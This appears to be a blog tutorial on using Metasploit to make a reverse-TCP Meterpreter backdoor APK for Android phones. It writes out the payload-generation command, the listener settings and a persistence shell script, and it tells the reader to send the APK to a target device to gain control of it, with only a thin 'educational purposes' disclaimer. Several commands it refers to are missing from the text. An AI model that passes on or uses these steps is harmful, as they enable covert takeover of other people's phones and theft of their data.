Metasploit is one of the most powerful pentesting and exploitation tools out there, and in this tutorial, I’ll show you how to use it to create an access backdoor on any android phone and gain control over it.
DISCLAIMER: All the information in this article is intended for educational purposes only. I am not responsible for any misuse.
Step 0: Fire up Metasploit
If you’re using Kali Linux/BackBox/BackTrack, metasploit comes pre-installed with the system. Otherwise, you can download it from: https://www.metasploit.com
To start it, go to your terminal and type:
Wait for sometime, and the metasploit CUI will start.
Step 1: Create your payload
Open a new terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=<your public ip address> R > /root/<name>.apk
This will create the actual exploit apk in your root folder.
Step 2: Set up the handler
Now go to the first terminal we opened. The msfconsole should still be open. Type:
set payload android/meterpreter/reverse_tcp
set LHOST <your internal ip>
A listener should open. Now just keep this listener open and send the apk to your target device. Wait for them to install and voila! You have a backdoor. Now let’s make it persistent!
Step 3: The persistence script.
Go to your root folder and create a new text file.
Write (Don’t copy!) the following lines in it:
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
Save it as <name>.sh. sh is important.
Step 4: Upload it!
Go to your exploit meterpreter shell and type:
Check if you are in the correct directory by typing:
You should be in /storage/emulated/legacy/Download
Now upload the script:
Step 5: Execute!
Now, go to the place where you uploaded the script:
Now press ctrl+c to exit shell.
Step 6: Testing!
Close the msfconsole terminal. Open a new terminal and redo Step 2. This time, your terminal will instantly enter the meterpreter shell.
Note: The back door persistence will be disabled if the phone reboots.